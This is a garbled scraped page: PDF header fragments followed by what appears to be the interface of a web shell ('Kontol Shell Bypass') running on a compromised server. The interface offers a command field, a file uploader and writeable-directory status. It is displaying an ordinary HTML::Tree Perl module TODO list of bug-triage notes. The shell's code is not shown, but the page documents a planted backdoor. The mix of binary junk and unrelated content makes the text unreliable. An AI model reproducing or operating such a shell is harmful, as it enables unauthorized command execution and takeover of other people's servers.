%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/thread-self/root/usr/share/doc/libhtml-tree-perl/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/thread-self/root/usr/share/doc/libhtml-tree-perl/TODO
TO-DO LIST FOR HTML::Tree

* Make more and better tests!  Regression and otherwise.

    './Build testcover' for the coverage details

* Make as_HTML emit the DOCTYPE declaration before <html...>

* Maybe reorganize the HTMLE::Element docs some time?



========================================================================

RT's

14212 	HTML::TreeBuilder generates text nodes in a strange encoding

	MOVE This is a bug in HTML::Entities, line 479, is encoding the Chinese
        characters. Adding the following code reveals this:

print(STDERR "1: ref = $$ref\n");
	$$ref =~ s/([^\n\r\t !\#\$%\(-;=?-~])/$char2entity{$1} || num_entity($1)/ge;
print(STDERR "2: ref = $$ref\n");

1: ref = This is a test 漢語
2: ref = This is a test &aelig;&frac14;&cent;&egrave;&ordf;&#158;

19724 	Can't distinguish among ending tags

	TRIAGE Where in the parser are the tokens handled? Suspect he'd have to use HTML::Parser directly.

24407 	</p> w/o a previous <p> ends the treebuild...

	TRIAGE Invalid HTML breaks parse.

26938 	as_XML doesn't encode enough characters, specifically CR and LF

	TRIAGE Perfectly valid to drop white space in an attibute.

27288 	as_HTML() for frameset html code produces implicit <body> tag

	CLOSE body is valid there. Needs to turn off implicit tags if he doesn't want them.

28404 	tests fail when PERL_UNICODE is set

	TRIAGE

33063 	Feature request: suppress output of implicit elements by as_HTML

	TRIAGE

33523 	Incorrect parsing of nested inline elements

	CLOSE It's invalid to nest entities that way.

33961 	Allow optional_end_tags to be set globally

	CLOSE This is already possible.

35948 	Unhelpful message if I pass an arbitrary object in content.

	TRIAGE Suggest fix breaks sub classing, need a better fix.

37537 	Implementation of as_HTML makes it effectively impossible to subclass

	TRIAGE

38398 	TreeBuilder can broke tree with correct nesting

	TRIAGE invalid HTML breaks parsing.

41945 	cpan(1) install fails on OS X

	Maybe FIXED, #! line was odd.

42209 	The word "value" appears if you supply value => undef to an input of type "text"

	TRIAGE This is because of the line '$val = $attr unless defined $val;'
	Guess this is to catch attributes that don't have values?

45069 	test failure

	TRIAGE Can't duplicate.

46219 	Debugger dies on parse()

	TRIAGE Can't duplicate.

48344 	Documentation for tree/element traversal is conflicting/confusing

	TRIAGE

53658 	HTML::Element::as_text collapses internal whitespace

	TRIAGE The white space is being consolidated somewhere, HTML::Parser?,
        so there is only 1 space by output time.

53926 	Bug in HTML::TreeBuilder - <link> inside <ol> not parsed

	TRIAGE Invalid HTML breaks parsing.


Kontol Shell Bypass